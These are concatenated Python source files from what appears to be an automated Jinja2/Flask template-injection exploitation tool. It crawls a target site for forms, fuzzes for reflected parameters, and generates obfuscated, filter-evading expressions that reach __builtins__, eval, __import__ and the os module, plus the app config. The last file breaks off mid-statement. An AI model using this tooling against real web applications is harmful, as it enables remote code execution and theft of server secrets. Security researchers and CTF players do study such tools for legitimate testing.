        "boolean_not",
    ],
    [
        "boolean_and",
    ],
    [
        "boolean_or",
    ],
    [
        "ifelse",
    ],
][::-1]

precedence = {name: i for i, lst in enumerate(precedence_lst) for name in lst}


def unparse(tree):
    content = ""
    for target, subtree in tree:
        if target[0] == WITH_CONTEXT_VAR:
            continue
        if target[0] in [LITERAL, FLASK_CONTEXT_VAR, JINJA_CONTEXT_VAR]:
            content += target[1]
        elif target[0] == ONEOF:
            content += unparse(subtree)
        elif subtree:
            content += unparse(subtree)
    return content


def iter_subtree(tree):
    for target, subtree in tree:
        # 需要跳过literal等, 因为其可能不是一个表达式而是一个或者多个token
        if subtree and (
            target[0]
            not in [
                "literal",
                "oneof",
                "string_string_concat",
            ]
        ):
            yield from iter_subtree(subtree)
    yield unparse(tree), tree


def join_target(sep: Target, targets: List[Target]) -> List[Target]:
    if len(targets) == 0:
        return []
    assert len(targets) >= 1
    ret = [
        targets[0],
    ]
    for target in targets[1:]:
        ret.append(sep)
        ret.append(target)
    return ret


def tree_precedence(tree) -> Union[int, None]:
    answer = float("inf")
    for target, sub_target_tree in tree:
        if target[0] in [LITERAL, UNSATISFIED]:
            pass
        elif target[0] == EXPRESSION:
            answer = min(answer, target[1])
        elif target[0] in [
            PLUS,
            MULTIPLY,
            MOD,
            ATTRIBUTE,
            ITEM,
            MODULE_OS,
            FUNCTION_CALL,
        ]:
            # might be transformed into filters
            sub_target_answer = tree_precedence(sub_target_tree)
            if sub_target_answer:
                answer = min(answer, sub_target_answer)
        elif target[0] in precedence:
            answer = min(answer, precedence[target[0]])
        elif sub_target_tree:
            sub_target_answer = tree_precedence(sub_target_tree)
            if sub_target_answer:
                answer = min(answer, sub_target_answer)
    return int(answer) if answer != float("inf") else None


def find_bad_exprs(tree, is_expr_bad_func):
    nodes = []
    for payload_unparsed, targetlist in iter_subtree(tree):
        if is_expr_bad_func(payload_unparsed):
            nodes.append((payload_unparsed, targetlist))
    return nodes


def str_escape(value: str, quote="'"):
    """
    转义字符串中的引号和反斜杠，但不会在两旁加上引号。
    用法："'{}'".format(str_escape("asdf", "'"))
    """
    return value.replace("\\", "\\\\").replace(quote, "\\" + quote)


def transform_int_chars_charcodes(int_chars, charcodes, keepfirst=False):
    charcode_dict = {str(int(chr(x), 0)): chr(x) for x in charcodes}
    return "".join(charcode_dict.get(c, c) for c in int_chars)


def transform_int_chars_unicode(int_chars):
    return [
        transform_int_chars_charcodes(int_chars, charcodes)
        for charcodes in UNICODE_INT_CHARCODES
    ]


def unwrap_whitespace(target_list: List[Target]) -> List[Target]:
    """替换target_list中的whitespace target为实际的literal
    会被payloadgen调用而不是被expression_gen调用

    Args:
        target_list (List[Target]): 输入的target list

    Returns:
        List[Target]: 输出，如果没有whitespace则返回原target list
    """
    if all(target != (WHITESPACE,) for target in target_list):
        return target_list
    alternatives = []
    for whitespace in WHITESPACES_AND_EMPTY:
        alternative = []
        for target in target_list:
            if target == (WHITESPACE,):
                alternative.append((LITERAL, whitespace))
            else:
                alternative.append(target)
        alternatives.append(alternative)
    return [(ONEOF, alternatives)]


def removeprefix_string(text: str, prefix: str) -> str:
    """兼容python 3.9及以下的removeprefix函数

    Args:
        text (str): text
        prefix (str): 需要去除的prefix

    Returns:
        str: 处理结果
    """
    if text.startswith(prefix):
        return text[len(prefix) :]
    return text


def targets_from_pattern(
    pattern: str, mapping: Dict[str, Union[Target, List[Target]]]
) -> List[Target]:
    """根据pattern将字符串转换成对应的target列表
    示例："'abcde'[NUM]", {"NUM": (INTEGER, 1)} ---> [
        (LITERAL, "'abcde'["),
        (INTEGER, 1),
        (LITERAL, "]")
    ]

    Args:
        pattern (str): 给定的pattern
        mapping (Dict[str, Union[Target, List[Target]]]): 关键字和target的对应关系

    Returns:
        List[Target]: 生成结果
    """
    result = []
    toparse = ""
    while pattern:
        found = False
        for keyword, value in mapping.items():
            if pattern.startswith(keyword):
                result.append((LITERAL, toparse))
                if isinstance(value, list):
                    result += value
                else:
                    result.append(value)
                toparse = ""
                pattern = removeprefix_string(pattern, keyword)
                found = True
                break
        if not found:
            toparse += pattern[0]
            pattern = pattern[1:]
    if toparse:
        result.append((LITERAL, toparse))
    return result


def literal_to_target(literal: str) -> Target:
    """将literal转成expression target
    如果literal是`aaa|bbb`的格式，那它就是一个带有filter的expression
    运算优先级和filter相同。

    Args:
        literal (str): literal

    Returns:
        Target: Target
    """
    # TODO: 我知道这里写得很烂但是暂时就用这种方式判断就好了，好好计算优先级
    # 从而省掉一些括号这种事情之后再说
    return (
        (EXPRESSION, precedence["plain_filter"], [(LITERAL, literal)])
        if re.match(r"^[a-z0-9\\|]+$", literal)
        else (EXPRESSION, precedence["enclose"], [(ENCLOSE, (LITERAL, literal))])
    )



from contextlib import contextmanager
from rich.console import Console
from rich.progress import (
    BarColumn,
    Progress,
    TextColumn,
    TimeRemainingColumn,
)
console: Console = Console(stderr=True)

class PbarManager:
    def __init__(self):
        self.progress = Progress(
            TextColumn("[bold yellow]{task.description}", justify="left"),
            BarColumn(bar_width=None),
            "[bold yellow][progress.percentage]{task.percentage:>3.1f}%",
            "•",
            TimeRemainingColumn(),
            console=console,
        )

    @contextmanager
    def pbar(self, it, description):
        task_id = self.progress.add_task(description, start=False)
        self.progress.start_task(task_id)
        pbar = Pbar(self.progress, task_id, it)

        yield pbar

        self.progress.remove_task(task_id)


class Pbar:
    def __init__(self, progress: Progress, task_id, it):
        self.progress = progress
        self.task_id = task_id
        self.it_completed = 0
        self.progress.update(self.task_id, total=len(it))
        self.it = iter(it)

    def __iter__(self):
        return self

    def __next__(self):
        self.it_completed += 1
        self.progress.update(self.task_id, completed=self.it_completed)
        return next(self.it)

    def update(self, *args, **kwargs):
        return self.progress.update(self.task_id, *args, **kwargs)


pbar_manager = PbarManager()



"""扫描指定的网站并返回所有表格

"""

import logging
import re
import random
import string

from urllib.parse import urlparse
from typing import Union, Generator, Tuple, List, Set
from rich.markup import escape as rich_escape
from bs4 import BeautifulSoup

from .form import get_form, parse_forms, Form
from .requester import HTTPRequester
from .wordlist import HTTP_PARAMS_LIST
from .pbar import pbar_manager

logger = logging.getLogger("scan_url")
PARAM_CHUNK_SIZE_GET = 50
PARAM_CHUNK_SIZE_POST = 500
PARAM_MAXIMUM_COUNT = 5


def parse_urls(html: Union[str, BeautifulSoup]) -> list:
    """从html中解析出所有的链接

    Args:
        html (str|BeautifulSoup): HTML

    Returns:
        List[str]: 所有链接
    """
    if isinstance(html, str):
        bs_obj = BeautifulSoup(html, "html.parser")
    elif isinstance(html, BeautifulSoup):
        bs_obj = html

    return [
        element.attrs["href"] for element in bs_obj.select("a") if "href" in element
    ]


def burst_respond_params_data(
    requester: HTTPRequester, url: str, html_str: str
) -> Tuple[List[str], List[str]]:
    """根据初始HTML文本爆破对应的URL是否有对应的参数

    Args:
        requester (Requester): Requester
        url (str): 目标url
        html_str (str): 目标的HTML文本

    Returns:
        Tuple[List[str], List[str]]: 产生回显的GET参数和POST参数
    """
    words: List[str] = (
        re.findall(r"\w{1,30}", html_str)
        + re.findall(r"[a-zA-Z0-9_-]{1,30}", html_str)
        + HTTP_PARAMS_LIST
    )
    words = list(set(words))
    random.shuffle(words)
    if len(words) > PARAM_CHUNK_SIZE_GET * 100:
        logger.warning(
            "found %d params, don't burst", len(words), extra={"highlighter": None}
        )
        return [], []
    logger.info(
        "Fuzzing %d params...",
        len(words),
        extra={"highlighter": None},
    )
    respond_post_params: Set[str] = set()
    respond_get_params: Set[str] = set()

    is_http_method_supported = True
    with pbar_manager.pbar(
        range(0, len(words), PARAM_CHUNK_SIZE_POST), "burst_respond_params_data POST"
    ) as it:
        for i in it:
            words_chunk = words[i : i + PARAM_CHUNK_SIZE_POST]
            for _ in range(3):
                data = {
                    k: "".join(random.choices(string.ascii_lowercase, k=6))
                    for k in words_chunk
                }
                resp = requester.request(method="POST", url=url, data=data)
                if resp is not None:
                    respond_post_params |= set(
                        k for k, v in data.items() if v in resp.text
                    )
                    is_http_method_supported = resp.status_code != 405
                    break

            if not is_http_method_supported:
                break

    is_http_method_supported = True
    with pbar_manager.pbar(
        range(0, len(words), PARAM_CHUNK_SIZE_GET), "burst_respond_params_data GET"
    ) as it:
        for i in it:
            words_chunk = words[i : i + PARAM_CHUNK_SIZE_GET]
            for _ in range(3):
                params = {
                    k: "".join(random.choices(string.ascii_lowercase, k=6))
                    for k in words_chunk
                }

                resp = requester.request(method="GET", url=url, params=params)
                if resp is not None:
                    respond_get_params |= set(
                        k for k, v in params.items() if v in resp.text
                    )
                    is_http_method_supported = resp.status_code != 405
                    break

            if not is_http_method_supported:
                break
    return list(respond_get_params), list(respond_post_params)


def yield_form(
    requester: HTTPRequester, start_url: str
) -> Generator[Tuple[str, List[Form]], None, None]:
    """根据起始URL扫描出所有的表格

    Args:
        requester (Requester): HTTP工具类Requester
        start_url (str): 起始URL

    Yields:
        Generator[Tuple[str, List[Form]], None, None]:
            所有URL与其中的表格
    """
    found = False
    targets = [
        start_url,
    ]
    visited = set()
    logger.info("Start scanning", extra={"highlighter": None})
    while targets:
        target_url = targets.pop(0)
        if target_url in visited:
            continue
        visited.add(target_url)

        resp = requester.request(method="GET", url=target_url)
        if resp is None:
            logger.info(
                "Fetch URL %s failed!",
                target_url,
                extra={"highlighter": None},
            )
            continue

        html = BeautifulSoup(resp.text, "html.parser")
        forms = parse_forms(target_url, html)

        if forms:
            yield target_url, forms
            found = True
        with pbar_manager.progress:
            respond_get_params, respond_post_params = burst_respond_params_data(
                requester, target_url, resp.text
            )
        if respond_get_params and len(respond_get_params) < PARAM_MAXIMUM_COUNT:
            logger.info(
                "Found [yellow]GET[/] params with burst: [blue]%s[/]",
                rich_escape(repr(respond_get_params)),
                extra={"markup": True, "highlighter": None},
            )
            yield target_url, [
                get_form(
                    action=urlparse(target_url).path,
                    inputs=respond_get_params,
                    method="GET",
                )
            ]
            found = True
        if respond_post_params and len(respond_post_params) < PARAM_MAXIMUM_COUNT:
            logger.info(
                "Found [yellow]POST[/] params with burst: [blue]%s[/]",
                rich_escape(repr(respond_post_params)),
                extra={"markup": True, "highlighter": None},
            )
            yield target_url, [
                get_form(
                    action=urlparse(target_url).path,
                    inputs=respond_post_params,
                    method="POST",
                )
            ]
            found = True

        targets += parse_urls(html)
    if not found:
        logger.warning("Found nothing.", extra={"highlighter": None})



import sys  # noqa

sys.path.append("..")  # noqa

import unittest
import logging
import os

import requests

import fenjing
from fenjing.context_vars import const_exprs, const_exprs_py3

from jinja2 import Template

VULUNSERVER_ADDR = os.environ.get("VULUNSERVER_ADDR", "http://127.0.0.1:5000")

fenjing.payload_gen.logger.setLevel(logging.ERROR)


class ContextVarsTests(unittest.TestCase):
    def test_const_exprs(self):
        exprs = {**const_exprs, **const_exprs_py3}
        for k, (v, _) in exprs.items():
            payload = "{%if (EXPR)==(VALUE)%}yes{%endif%}".replace("EXPR", k).replace(
                "VALUE", repr(v)
            )
            result = Template(payload).render()
            assert "yes" in result, f"Test Failed for {k!r}"



import re

# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,unused-argument

from ..payload_gen import expression_gen, precedence
from ..rules_utils import targets_from_pattern


from ..const import *

# ---


@expression_gen
def gen_attribute_normal1(context, obj_req, attr_name):
    if not re.match("[A-Za-z_]([A-Za-z0-9_]+)?", attr_name):
        return [(UNSATISFIED,)]
    target_list = [
        (ENCLOSE_UNDER, precedence["attribute"], obj_req),
        (LITERAL, "."),
        (LITERAL, attr_name),
    ]
    return [(EXPRESSION, precedence["attribute"], target_list)]


@expression_gen
def gen_attribute_normal2(context, obj_req, attr_name):
    target_list = [
        (ENCLOSE_UNDER, precedence["item"], obj_req),
        (LITERAL, "["),
        (STRING, attr_name),
        (LITERAL, "]"),
    ]
    return [(EXPRESSION, precedence["item"], target_list)]


@expression_gen
def gen_attribute_attrfilter(context, obj_req, attr_name):
    target_list = [
        (ENCLOSE_UNDER, precedence["plain_filter"], obj_req),
        (LITERAL, "|attr"),
        (
            WRAP,
            [(STRING, attr_name)],
        ),
    ]
    return [(EXPRESSION, precedence["called_filter"], target_list)]


@expression_gen
def gen_attribute_attrfilter2(context, obj_req, attr_name):
    target_list = [
        (ENCLOSE_UNDER, precedence["plain_filter"], obj_req),
        (LITERAL, "|attr("),
        (WHITESPACE,),
        (STRING, attr_name),
        (WHITESPACE,),
        (LITERAL, ",)"),
    ]
    return [(EXPRESSION, precedence["called_filter"], target_list)]


@expression_gen
def gen_attribute_map(context, obj_req, attr_name):
    target_list = targets_from_pattern(
        "( OBJ , ) | map( ATTR , NAME ) | first",
        {
            "OBJ": obj_req,
            " ": (WHITESPACE,),
            "ATTR": (STRING, "attr"),
            "NAME": (STRING, attr_name),
        },
    )

    return [(EXPRESSION, precedence["plain_filter"], target_list)]


# ---


@expression_gen
def gen_item_normal1(context, obj_req, item_name):
    if not re.match("[A-Za-z_]([A-Za-z0-9_]+)?", item_name):
        return [(UNSATISFIED,)]
    target_list = [
        (ENCLOSE_UNDER, precedence["attribute"], obj_req),
        (LITERAL, "."),
        (LITERAL, item_name),
    ]
    return [(EXPRESSION, precedence["attribute"], target_list)]


@expression_gen
def gen_item_normal2(context, obj_req, item_name):
    target_list = [
        (ENCLOSE_UNDER, precedence["item"], obj_req),
        (LITERAL, "["),
        (STRING, item_name),
        (LITERAL, "]"),
    ]
    return [(EXPRESSION, precedence["item"], target_list)]


@expression_gen
def gen_item_getfunc(context, obj_req, item_name):
    target = (FUNCTION_CALL, (ATTRIBUTE, obj_req, "get"), [(STRING, item_name)])
    return [(EXPRESSION, precedence["function_call"], [target])]


@expression_gen
def gen_item_dunderfunc(context, obj_req, item_name):
    target = (FUNCTION_CALL, (ATTRIBUTE, obj_req, "__getitem__"), [(STRING, item_name)])
    return [(EXPRESSION, precedence["function_call"], [target])]

# ---


@expression_gen
def gen_class_attribute_literal(context, obj_req, attr_name):
    class_target = (
        ATTRIBUTE,
        obj_req,
        "__class__",
    )
    target_list = [
        (ENCLOSE_UNDER, precedence["attribute"], class_target),
        (LITERAL, "." + attr_name),
    ]
    return [(EXPRESSION, precedence["attribute"], target_list)]


@expression_gen
def gen_class_attribute_attrfilter(context, obj_req, attr_name):
    class_target = (
        ATTRIBUTE,
        obj_req,
        "__class__",
    )
    target_list = [
        (ENCLOSE_UNDER, precedence["plain_filter"], class_target),
        (LITERAL, "|attr"),
        (
            WRAP,
            [(STRING, attr_name)],
        ),
    ]
    return [(EXPRESSION, precedence["called_filter"], target_list)]


@expression_gen
def gen_class_attribute_attrfilter2(context, obj_req, attr_name):
    class_target = (
        ATTRIBUTE,
        obj_req,
        "__class__",
    )
    target_list = [
        (ENCLOSE_UNDER, precedence["plain_filter"], class_target),
        (LITERAL, "|attr("),
        (STRING, attr_name),
        (LITERAL, ",)"),
    ]
    return [(EXPRESSION, precedence["called_filter"], target_list)]


# ---


@expression_gen
def gen_chained_attribute_item_normal(context, obj_req, *attr_item_req):
    if not attr_item_req:
        return [
            obj_req,
        ]
    first_req, *other_req = attr_item_req
    req_type, req_name = first_req
    got_req = (
        req_type,
        obj_req,
        req_name,
    )
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            got_req,
            *other_req,
        ),
    ]



import random
import string

# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,unused-argument
from ..rules_utils import targets_from_pattern
from ..payload_gen import expression_gen, precedence

from ..const import *


def randomcase(s):
    return "".join(c.lower() if random.random() < 0.5 else c.upper() for c in s)


brainrot_varname = random.choice(BRAINROT_VARNAMES)
is_brainrot_enabled = random.random() < 0.5

var_attrs = [
    (FLASK_CONTEXT_VAR, "g", "pop"),
    (FLASK_CONTEXT_VAR, "g", "get"),
    (JINJA_CONTEXT_VAR, "cycler", "next"),
    (JINJA_CONTEXT_VAR, "cycler", "reset"),
    (FLASK_CONTEXT_VAR, "session", "get"),
    (FLASK_CONTEXT_VAR, "request", "close"),
    (JINJA_CONTEXT_VAR, "cycler", "__init__"),
    (JINJA_CONTEXT_VAR, "joiner", "__init__"),
    (JINJA_CONTEXT_VAR, "namespace", "__init__"),
]

# ---

# the waf sucks and we're joking about it.


@expression_gen
def gen_builtins_dict_brainrot(context):
    if not is_brainrot_enabled:
        return [(UNSATISFIED,)]
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (
                EXPRESSION,
                precedence["attribute"],
                [(LITERAL, brainrot_varname + ".__eq__")],
            ),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "__builtins__"),
        )
    ]


@expression_gen
def gen_builtins_dict_brainrot2(context):
    if not is_brainrot_enabled:
        return [(UNSATISFIED,)]
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (
                EXPRESSION,
                precedence["called_filter"],
                targets_from_pattern(
                    "NAME|attr(EQ)",
                    {"NAME": (LITERAL, brainrot_varname), "EQ": (STRING, "__eq__")},
                ),
            ),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "__builtins__"),
        )
    ]


@expression_gen
def gen_builtins_dict_lipsum(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (JINJA_CONTEXT_VAR, "lipsum"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "__builtins__"),
        )
    ]


@expression_gen
def gen_builtins_dict_varattrs(context):
    # [] cannot used for undefined
    # e['__eq__'] would raise exception
    alternatives = [
        [
            (
                CHAINED_ATTRIBUTE_ITEM,
                (target_type, obj_name),
                (ATTRIBUTE, attr_name),
                (ATTRIBUTE, "__globals__"),
                (ITEM, "__builtins__"),
            )
        ]
        for target_type, obj_name, attr_name in var_attrs
    ]
    return [(ONEOF, alternatives)]


@expression_gen
def gen_builtins_dict_undefined(context):
    funcs_attrs = [
        ("".join(random.choices(string.ascii_lowercase, k=3)), "__eq__")
        for _ in range(10)
    ]
    alternatives = [
        [
            (
                CHAINED_ATTRIBUTE_ITEM,
                (JINJA_CONTEXT_VAR, obj_name),
                (ATTRIBUTE, attr_name),
                (ATTRIBUTE, "__globals__"),
                (ITEM, "__builtins__"),
            )
        ]
        for obj_name, attr_name in funcs_attrs
    ]
    return [(ONEOF, alternatives)]


@expression_gen
def gen_builtins_dict_safesplit(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (EXPRESSION, precedence["plain_filter"], [(LITERAL, "()|safe")]),
            (ATTRIBUTE, "split"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "__builtins__"),
        )
    ]


@expression_gen
def gen_builtins_dict_safejoin(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (EXPRESSION, precedence["plain_filter"], [(LITERAL, "()|safe")]),
            (ATTRIBUTE, "join"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "__builtins__"),
        )
    ]


@expression_gen
def gen_builtins_dict_safelower(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (EXPRESSION, precedence["plain_filter"], [(LITERAL, "()|safe")]),
            (ATTRIBUTE, "lower"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "__builtins__"),
        )
    ]


@expression_gen
def gen_builtins_dict_safezfill(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (EXPRESSION, precedence["plain_filter"], [(LITERAL, "()|safe")]),
            (ATTRIBUTE, "zfill"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "__builtins__"),
        )
    ]


# ---


@expression_gen
def gen_import_func_general(context):
    return [(ITEM, (BUILTINS_DICT,), "__import__")]


# ---


@expression_gen
def gen_eval_func_general(context):
    return [(ITEM, (BUILTINS_DICT,), "eval")]


@expression_gen
def gen_eval_func_mapfilter(context):
    pattern = (
        "{e|e:e}|map(**{'attribute':'__add__'})|map(**{'attribute':'__globals__'})"
        "|map(**{'attribute':'__builtins__'})|map(**{'attribute':'eval'})|first"
    )
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            targets_from_pattern(
                pattern,
                {
                    "'attribute'": (GENERATED_EXPR, (STRING, "attribute")),
                    "'__add__'": (GENERATED_EXPR, (STRING, "__add__")),
                    "'__globals__'": (GENERATED_EXPR, (STRING, "__globals__")),
                    "'__builtins__'": (GENERATED_EXPR, (STRING, "__builtins__")),
                    "'eval'": (GENERATED_EXPR, (STRING, "eval")),
                },
            ),
        )
    ]


# ---


@expression_gen
def gen_eval_normal(context, eval_param):
    return [(FUNCTION_CALL, (EVAL_FUNC,), [eval_param])]


# ---

# 获取flask配置的生成规则


@expression_gen
def gen_config_flask_context_var(context):
    return [(EXPRESSION, precedence["literal"], [(FLASK_CONTEXT_VAR, "config")])]


@expression_gen
def gen_config_self(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (FLASK_CONTEXT_VAR, "self"),
            (ATTRIBUTE, "__dict__"),
            (ITEM, "_TemplateReference__context"),
            (ITEM, "config"),
        )
    ]


# ---


@expression_gen
def gen_module_os_brainrotsys(context):
    # [] cannot used for undefined
    # e['__eq__'] would raise exception
    if not is_brainrot_enabled:
        return [(UNSATISFIED,)]
    brainrot_var = (
        ONEOF,
        [
            [
                (
                    EXPRESSION,
                    precedence["attribute"],
                    [(LITERAL, brainrot_varname + ".__eq__")],
                )
            ],
            [
                (
                    EXPRESSION,
                    precedence["called_filter"],
                    targets_from_pattern(
                        "NAME|attr(EQ)",
                        {"NAME": (LITERAL, brainrot_varname), "EQ": (STRING, "__eq__")},
                    ),
                )
            ],
        ],
    )
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            brainrot_var,
            (ATTRIBUTE, "__globals__"),
            (ITEM, "sys"),
            (ATTRIBUTE, "modules"),
            (ITEM, "os"),
        )
    ]


@expression_gen
def gen_module_os_sys(context):
    # [] cannot used for undefined
    # e['__eq__'] would raise exception
    alternatives = [
        [
            (
                CHAINED_ATTRIBUTE_ITEM,
                (target_type, obj_name),
                (ATTRIBUTE, attr_name),
                (ATTRIBUTE, "__globals__"),
                (ITEM, "os"),
            )
        ]
        for target_type, obj_name, attr_name in var_attrs
        if target_type == JINJA_CONTEXT_VAR
    ]
    return [(ONEOF, alternatives)]


@expression_gen
def gen_module_os_import(context):
    return [(FUNCTION_CALL, (IMPORT_FUNC,), [(STRING, "os")])]


@expression_gen
def gen_module_os_eval(context):
    return [(FUNCTION_CALL, (EVAL, (STRING, "__import__")), [(STRING, "os")])]


# 有500修正了，可以大胆加规则


@expression_gen
def gen_module_os_config(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (CONFIG,),
            (CLASS_ATTRIBUTE, "__init__"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "os"),
        )
    ]


@expression_gen
def gen_module_os_gpop(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (FLASK_CONTEXT_VAR, "g"),
            (ATTRIBUTE, "pop"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "os"),
        )
    ]


@expression_gen
def gen_module_os_gget(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (FLASK_CONTEXT_VAR, "g"),
            (ATTRIBUTE, "get"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "os"),
        )
    ]


@expression_gen
def gen_module_os_urlfor(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (FLASK_CONTEXT_VAR, "url_for"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "os"),
        )
    ]



"""
生成和要求相符合的表达式，如('a'+'b')
生成过程为接受一个生成目标（如`(STRING, 'ab')`），遍历对应的生成规则expression_gen，利用waf函数
递归检查生成规则是否符合，并最终生成一个字符串形式的表达式
expression_gen：所有表达式生成规则
    接受一个生成目标，并返回一个生成目标的列表
    比如说接收(STRING, 'ab')，返回[(LITERAL, '"a"'), (LITERAL, '"b"')]
    也就是将一个生成目标“展开成”一系列生成目标
PayloadGen：将用户提供的生成目标一层层展开，并使用WAF检测展开后是否可以通过WAF，然后
    根据展开结果返回相应的表达式。
"""

# make pylint shut up, these are rules for generating expression, not normal code containing logic.
# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,logging-format-interpolation,unused-argument,consider-using-f-string,too-many-lines
# flake8: noqa

import re
import logging

from collections import defaultdict
from contextlib import contextmanager
from typing import (
    Callable,
    DefaultDict,
    List,
    Dict,
    Union,
)
from pprint import pformat

from rich.markup import escape as rich_escape

from .const import *
from .options import Options
from .rules_utils import (
    precedence,
    tree_precedence,
    unwrap_whitespace,
)
from .rules_types import *
from .pbar import pbar_manager, Pbar

expression_gens: DefaultDict[str, List[ExpressionGenerator]] = defaultdict(list)
logger = logging.getLogger("payload_gen")


gen_weight_default = {
    "gen_string_percent_lower_c_concat": 1,
    "gen_string_lower_c_joinerbatch": 1,
    "gen_string_percent_urlencode2": 1,
    "gen_string_twostringconcat": 1,
    "gen_string_concat1": 1,
    "gen_string_concat2": 1,
    "gen_string_formatpercent": 1,
    "gen_attribute_attrfilter": 1,
    "gen_item_dunderfunc": 1,
}


@contextmanager
def optional_context(condition, data, mapper):
    """让一个contextmanager变为可选的"""
    if condition:
        with mapper(data) as result:
            yield result
    else:
        yield data


def expression_gen(f: ExpressionGenerator):
    gen_type = re.match("gen_([a-z_]+)_([a-z0-9]+)", f.__name__)
    if not gen_type:
        raise RuntimeError(f"Error found when register payload generator {f.__name__}")
    expression_gens[gen_type.group(1)].append(f)
    return f


class CacheByRepr:
    """缓存传入的对象，其中键可以是任意对象
    会将键的repr表达式作为键进行存储
    """

    def __init__(self):
        self.cache = {}

    def __setitem__(self, k, v):
        repr_k = repr(k)
        self.cache[repr_k] = self.cache.get(repr_k, [])
        self.cache[repr(k)].append((k, v))

    def __getitem__(self, k):
        repr_k = repr(k)
        for k_store, v in self.cache.get(repr_k, []):
            if k_store == k:
                return v
        raise KeyError(f"Not found: {repr_k}")

    def __delitem__(self, k):
        del self.cache[repr(k)]

    def __contains__(self, k):
        repr_k = repr(k)
        for k_store, _ in self.cache.get(repr_k, []):
            if k_store == k:
                return True
        return False

    def __iter__(self):
        return (k for k_repr in self.cache for k, v in self.cache[k_repr])

    def clear(self):
        self.cache = {}


class PayloadGenerator:
    """生成一个表达式，如('a'+'b')
    其会遍历对应的expression_gen，依次“展开”生成目标为一个生成目标的列表，递归地
    将每一个元素转为payload，拼接在一起并使用WAF函数检测是否合法。
    """

    def __init__(
        self,
        waf_func: WafFunc,
        context: Union[Mapping[str, Tuple[Any, int]], None] = None,
        callback: Union[Callable[[str, Dict], None], None] = None,
        options: Union[Options, None] = None,
        waf_expr_func: Union[WafFunc, None] = None,
        generated_exprs: Union[Dict[Target, PayloadGeneratorResult], None] = None,
    ):
        self.waf_func = (
            waf_func
            if waf_expr_func is None
            else (lambda x: waf_func(x) and waf_expr_func(x))
        )
        self.context = context if context else {}
        self.cache_by_repr = CacheByRepr()
        self.used_count = defaultdict(int)
        self.options = options if options else Options()
        if self.options.detect_mode == DetectMode.FAST:
            for k, v in gen_weight_default.items():
                self.used_count[k] += v
        self.callback = callback if callback else (lambda x, y: None)
        self.generated_exprs = generated_exprs if generated_exprs else {}

    def add_generated_expr(self, target, result):
        self.generated_exprs[target] = result

    # it is correct pylint, it returns a internal decorator.
    def create_generate_func_register():  # pylint: disable=no-method-argument
        generate_funcs = []

        def register(checker_func):
            def _wraps(runner_func):
                generate_funcs.append((checker_func, runner_func))
                return runner_func

            return _wraps

        return generate_funcs, register

    generate_funcs, register_generate_func = create_generate_func_register()

    def generate_by_list(
        self, targets: List[Target]
    ) -> Union[PayloadGeneratorResult, None]:
        """根据一个生成目标的列表生成payload并使用WAF测试

        Args:
            targets (List[Target]): 生成目标的列表

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果，其包含payload和payload用到的上下文中的变量
        """
        targets = unwrap_whitespace(targets)
        str_result, used_context, tree = "", {}, []

        for target in targets:
            for checker, runner in self.generate_funcs:
                if not checker(self, target):
                    continue
                result = runner(self, target)
                if result is None:
                    return None
                s, c, subs = result
                str_result += s
                used_context.update(c)
                tree.append((target, subs))
                break
            else:
                raise RuntimeError("it shouldn't runs this line")
        if not self.waf_func(str_result):
            return None
        return str_result, used_context, tree

    @register_generate_func(lambda self, target: target[0] == LITERAL)
    def literal_generate(
        self, target: LiteralTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """为literal类型的生成目标生成payload

        Args:
            target (LiteralTarget): 生成目标

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果
        """
        # 事先测试literal中的某些片段，从而提速
        # 因为这些片段的种类比Literal少得多，利于缓存
        # 为了提升速度，literal也会被generate_by_list检查
        # 不应该在这里检测单双引号，因为引号对应的页面hash可能被收集了，导致误判
        words = set(re.findall(r"[a-z]{3,}|[0-9]", target[1]))
        if not all(self.waf_func(word) for word in words):
            return None
        return (target[1], {}, [])

    @register_generate_func(lambda self, target: target[0] == GENERATED_EXPR)
    def generated_generate(
        self, target: GeneratedExprTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """找到已经准备好的生成结果

        Args:
            target (GeneratedExprTarget): 生成目标

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果
        """
        return self.generated_exprs.get(target[1])

    @register_generate_func(lambda self, target: target in self.cache_by_repr)
    def cache_generate(self, target: Target) -> Union[PayloadGeneratorResult, None]:
        """为已经缓存的生成目标生成payload

        Args:
            target (Target): 生成目标

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果
        """
        return self.cache_by_repr[target]

    @register_generate_func(lambda self, target: target[0] == EXPRESSION)
    def expression_generate(
        self, target: ExpressionTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """为expression的生成目标生成payload
        expression中有其的优先级和target列表，直接返回target列表

        Args:
            target (ExpressionTarget): 生成目标

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果
        """
        assert isinstance(target[2], list) and all(
